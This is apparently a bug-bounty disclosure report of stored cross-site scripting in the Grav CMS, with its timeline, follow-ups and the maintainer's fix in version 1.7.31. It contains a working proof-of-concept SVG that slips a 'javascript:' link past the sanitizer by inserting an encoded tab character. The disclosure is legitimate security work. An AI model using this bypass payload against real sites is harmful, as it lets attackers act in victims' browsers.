Cross-site Scripting (XSS) - Stored in getgrav/grav

Valid

Reported on

Mar 1st 2022

Description

SVG sanitizer cloud be bypassed via flowing SVG file that leads to stored XSS

Proof of Concept

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(document.domain)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>

Upload the above SVG file in your profile, view it, and click anywhere on the page then XSS will be triggered : Deepin-Screenshot-select-area-20220301125616.png

Impact

This vulnerability is capable of performing arbitrary actions on behalf of victims at the client side.

We are processing your report and will contact the getgrav/grav team within 24 hours. a year ago
We have contacted a member of the getgrav/grav team and are waiting to hear back a year ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. a year ago
Anna
a year ago

Researcher

Any Update ?

We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. a year ago
Anna
a year ago

Researcher

Any Update?

Djamil Legato validated this vulnerability a year ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
Djamil Legato marked this as fixed in 1.7.31 with commit f19297 a year ago
Djamil Legato has been awarded the fix bounty
This vulnerability will not receive a CVE
Djamil Legato
a year ago

Maintainer

Thank you, we have a fix for this

to join this conversation